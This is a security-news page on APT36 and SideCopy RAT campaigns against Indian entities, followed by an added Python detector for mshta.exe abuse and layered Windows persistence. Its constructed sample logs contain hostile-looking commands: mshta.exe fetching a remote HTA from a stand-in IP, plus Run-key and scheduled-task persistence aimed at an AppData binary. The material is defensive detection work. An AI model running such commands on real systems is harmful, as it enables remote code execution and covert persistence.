#apt36-transparent-tribe

Information security
from The Hacker News
2 days ago

APT36 and SideCopy Launch Cross-Platform RAT Campaigns Against Indian Entities

Pakistan-aligned groups SideCopy and APT36 use Geta RAT, Ares RAT, and DeskRAT to compromise Windows and Linux targets in India's defense sector via phishing.
from SecurityWeek
3 days ago

RATs in the Machine: Inside a Pakistan-Linked Three-Pronged Cyber Assault on India

One active campaign employs GETA RAT (often attributed specifically to the SideCopy subgroup of Transparent Tribe). It is a .NET RAT that abuses legitimate Windows components and .NET features (including mshta.exe, XAML deserialization, and in-memory payload execution) to avoid signature-based detection; mshta.exe is a signed Microsoft binary, so its execution alone rarely trips an application allowlist, and a payload deserialized in memory leaves little for file-based scanners to match. Persistence is achieved by layered startup mechanisms, so that removing any single one still leaves the implant with a way back in. "The result," writes Aditya Sood, VP of security engineering and AI strategy at Aryaka, in a blog post accompanying the report, "is a lightweight but durable foothold, well-suited for extended reconnaissance and intelligence gathering."
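The two behaviours the summary above singles out, mshta.exe used as a loader and redundant autostart entries, are both visible in ordinary process-creation and registry telemetry even when the payload itself never touches disk. The detector below is an added example written for this page, not code from SecurityWeek, Aryaka, or the cited report, and it encodes no indicators from the GETA RAT campaign: the log lines are constructed, the pipe-separated `host|time|event|user|image|parent|cmdline` layout is an assumption standing in for a Sysmon or EDR export, and the thresholds (five-minute window, user-writable paths) are illustrative choices.

```python
"""Flag mshta.exe abuse and layered persistence in process/registry events.

Added example for this page (not the vendor's or the report's code). The
event format and the sample lines below are constructed for illustration.
"""
import re
from collections import defaultdict

# Constructed events: host|HH:MM:SS|event|user|image|parent image|command line
SAMPLE_EVENTS = [
    r"ws01|10:00:01|ProcessCreate|alice|C:\Windows\System32\mshta.exe|C:\Program Files\Microsoft Office\WINWORD.EXE|mshta.exe https://203.0.113.7/update.hta",
    r"ws01|10:00:09|RegistrySet|alice|C:\Windows\System32\reg.exe|C:\Windows\System32\cmd.exe|reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\Users\alice\AppData\Roaming\upd.exe",
    r"ws01|10:00:12|ProcessCreate|alice|C:\Windows\System32\schtasks.exe|C:\Windows\System32\cmd.exe|schtasks /create /sc minute /mo 15 /tn Updater /tr C:\Users\alice\AppData\Roaming\upd.exe",
    r"ws02|11:30:00|ProcessCreate|bob|C:\Windows\System32\mshta.exe|C:\Windows\explorer.exe|mshta.exe C:\Tools\inventory.hta",
    r"ws03|12:00:00|ProcessCreate|carol|C:\Windows\System32\schtasks.exe|C:\Windows\System32\cmd.exe|schtasks /create /sc daily /tn Backup /tr C:\Program Files\Backup\run.exe",
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)
# Remote HTA fetch, or an inline script URI that needs no .hta file at all.
REMOTE_ARG = re.compile(r"\b(https?|ftp)://|^(javascript|vbscript):", re.IGNORECASE)
PERSIST_KIND = {
    "run_key": re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE),
    "sched_task": re.compile(r"schtasks(\.exe)?\s+/create", re.IGNORECASE),
    "startup_folder": re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE),
}


def parse_event(line):
    """Split one constructed event line into a dict; times become seconds."""
    host, ts, kind, user, image, parent, cmdline = line.split("|", 6)
    h, m, s = (int(x) for x in ts.split(":"))
    return {"host": host, "t": h * 3600 + m * 60 + s, "kind": kind, "user": user,
            "image": image.rsplit("\\", 1)[-1].lower(),
            "parent": parent.rsplit("\\", 1)[-1].lower(),
            "cmdline": cmdline}


def check_mshta(ev):
    """Return a reason string if this is a suspicious mshta.exe launch."""
    if ev["image"] != "mshta.exe":
        return None
    args = ev["cmdline"].split(None, 1)[1] if " " in ev["cmdline"] else ""
    if REMOTE_ARG.search(args):
        return "mshta.exe fetching remote or inline script"
    if ev["parent"] in OFFICE_PARENTS:
        return "mshta.exe spawned by Office process"
    return None  # local .hta from explorer.exe etc. is left for baselining


def persistence_kind(ev):
    for name, rx in PERSIST_KIND.items():
        if rx.search(ev["cmdline"]):
            return name
    return None


def find_layered_persistence(events, window=300):
    """(host, user) pairs that install two or more distinct autostart
    mechanisms within `window` seconds, at least one targeting a
    user-writable directory. Returns [((host, user), [kinds]), ...]."""
    by_actor = defaultdict(list)
    for ev in events:
        kind = persistence_kind(ev)
        if kind:
            by_actor[(ev["host"], ev["user"])].append((ev["t"], kind, ev["cmdline"]))
    hits = []
    for actor, items in by_actor.items():
        items.sort()
        for t0, _, _ in items:
            group = [it for it in items if t0 <= it[0] <= t0 + window]
            kinds = {k for _, k, _ in group}
            if len(kinds) >= 2 and any(USER_WRITABLE.search(c) for _, _, c in group):
                hits.append((actor, sorted(kinds)))
                break  # one alert per actor is enough
    return hits


def detect(lines):
    """Run both checks over raw event lines and return alert strings."""
    events = [parse_event(line) for line in lines]
    alerts = []
    for ev in events:
        why = check_mshta(ev)
        if why:
            alerts.append(f"{ev['host']}: {why}: {ev['cmdline']}")
    for (host, user), kinds in find_layered_persistence(events):
        alerts.append(f"{host}: layered persistence by {user}: {', '.join(kinds)}")
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

On the sample data this raises two alerts, both for ws01: the Office-spawned mshta.exe pulling a remote HTA, and the Run key plus scheduled task created seconds apart against the same AppData binary. ws02's local HTA launched from explorer.exe and ws03's single scheduled task under Program Files are deliberately left alone, because either on its own is common administrative noise. What this telemetry cannot see is the XAML deserialization step itself; catching that needs script-block or AMSI logging on the HTA content, .NET ETW events, or memory scanning of the mshta.exe process, so treat the two rules here as a trigger for collecting that evidence rather than as a complete detection.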